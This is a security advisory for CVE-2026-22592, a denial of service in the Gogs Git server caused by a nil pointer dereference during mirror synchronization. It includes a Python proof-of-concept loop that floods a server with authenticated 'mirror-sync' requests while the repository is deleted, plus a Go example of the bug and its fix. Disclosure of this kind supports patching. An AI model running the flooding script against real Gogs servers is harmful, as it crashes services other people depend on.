CVE-2026-22592
MEDIUM 6.5 | EPSS 0.02% | Gogs has a Denial of Service issue
Description
### Summary

An authenticated user can cause a DoS attack. If one of the repo files is deleted before synchronization, it will cause the application to crash.

### Details

If GetMirrorByRepoID fails, the error log dereferences a nil pointer. This happens if the repository no longer exists.

https://github.com/gogs/gogs/blob/4cc83c498b6ae59356a04912d68a932165bad5e6/internal/database/mirror.go#L333-L337

If `err != nil`, `m` is always `nil`:

https://github.com/gogs/gogs/blob/4cc83c498b6ae59356a04912d68a932165bad5e6/internal/database/mirror.go#L269-L278

### PoC

Spam mirror-sync on the repo and delete the repo. Python code that spams mirror-sync:

```py
import requests

url = "http://gogs.lan:3000/superuser/gobypass403/settings"
headers = {
    "Cookie": "lang=en-US; i_like_gogs=fe32281ab84ae868; _csrf=UCw6xvqR-L7YLBMPjujwjywxy8s6MTc2NDc3NDQ2NDE1MzU5ODQ3Mg",
}
data = {
    "_csrf": "UCw6xvqR-L7YLBMPjujwjywxy8s6MTc2NDc3NDQ2NDE1MzU5ODQ3Mg",
    "action": "mirror-sync",
}

# Repeatedly trigger mirror-sync; the repo is deleted while this loop runs.
while True:
    print("syncing")
    response = requests.post(url, headers=headers, data=data)
```

### Impact

Denial of Service: server crash.
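The Details section describes a classic Go defect: a lookup returns `(nil, err)`, and the error-logging branch formats a field of the nil result. The following is an added illustration of that pattern and its fix, not Gogs' own code; `Mirror`, `getMirrorByRepoID`, `vulnerableSync` and `fixedSync` are hypothetical stand-ins, and the in-memory `store` map is constructed sample data standing in for the database.

```go
package main

import (
	"errors"
	"fmt"
)

// Mirror is a hypothetical stand-in for a repository mirror record.
type Mirror struct {
	RepoID   int64
	Interval int
}

// ErrMirrorNotExist models the "repository no longer exists" failure.
var ErrMirrorNotExist = errors.New("mirror does not exist")

// getMirrorByRepoID mimics a lookup that returns (nil, err) once the repo is gone.
func getMirrorByRepoID(store map[int64]*Mirror, repoID int64) (*Mirror, error) {
	m, ok := store[repoID]
	if !ok {
		return nil, ErrMirrorNotExist
	}
	return m, nil
}

// vulnerableSync reproduces the bug pattern: on error it still reads m.RepoID,
// but m is always nil when err != nil. The deferred recover exists only so the
// caller can observe the panic instead of the process crashing.
func vulnerableSync(store map[int64]*Mirror, repoID int64) (msg string, panicked bool) {
	defer func() {
		if r := recover(); r != nil {
			panicked = true
			msg = fmt.Sprint("panic: ", r)
		}
	}()
	m, err := getMirrorByRepoID(store, repoID)
	if err != nil {
		// BUG: nil pointer dereference while building the error message.
		return fmt.Sprintf("GetMirrorByRepoID [%d]: %v", m.RepoID, err), false
	}
	return fmt.Sprintf("synced mirror for repo %d", m.RepoID), false
}

// fixedSync logs the caller-supplied repoID instead of touching m on the error path.
func fixedSync(store map[int64]*Mirror, repoID int64) (msg string, panicked bool) {
	m, err := getMirrorByRepoID(store, repoID)
	if err != nil {
		return fmt.Sprintf("GetMirrorByRepoID [%d]: %v", repoID, err), false
	}
	return fmt.Sprintf("synced mirror for repo %d", m.RepoID), false
}

func main() {
	// Constructed sample store: repo 1 exists, repo 2 has been deleted.
	store := map[int64]*Mirror{1: {RepoID: 1, Interval: 8}}
	fmt.Println(vulnerableSync(store, 1))
	fmt.Println(vulnerableSync(store, 2)) // panics on the nil result, recovered here
	fmt.Println(fixedSync(store, 2))      // clean error, no dereference
}
```

The general rule this demonstrates: on any `err != nil` branch, treat every other return value as unusable, and build log messages from the inputs you already hold (here the repo ID) rather than from the failed result. A `go vet`-style review of error paths, or a test that exercises the "record deleted between request and lookup" race, catches this class of crash before an unauthenticated-looking trigger like a repeated sync request does.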
Affected packages (2)
- Go / gogs.io/gogs: from 0, < 0.13.4
- Go / gogs.io/gogs: from 0
CVSS score
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | MEDIUM 6.5 | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H |
References (6)
- ADVISORY: https://nvd.nist.gov/vuln/detail/CVE-2026-22592
- PATCH: https://github.com/gogs/gogs
- WEB: https://github.com/gogs/gogs/blob/4cc83c498b6ae59356a04912d68a932165bad5e6/internal/database/mirror.go#L269-L278
- WEB: https://github.com/gogs/gogs/blob/4cc83c498b6ae59356a04912d68a932165bad5e6/internal/database/mirror.go#L333-L337
- WEB: https://github.com/gogs/gogs/commit/961a79e8f9f2b3190ea804bcf635e4b43b123272
- WEB: https://github.com/gogs/gogs/security/advisories/GHSA-cr88-6mqm-4g57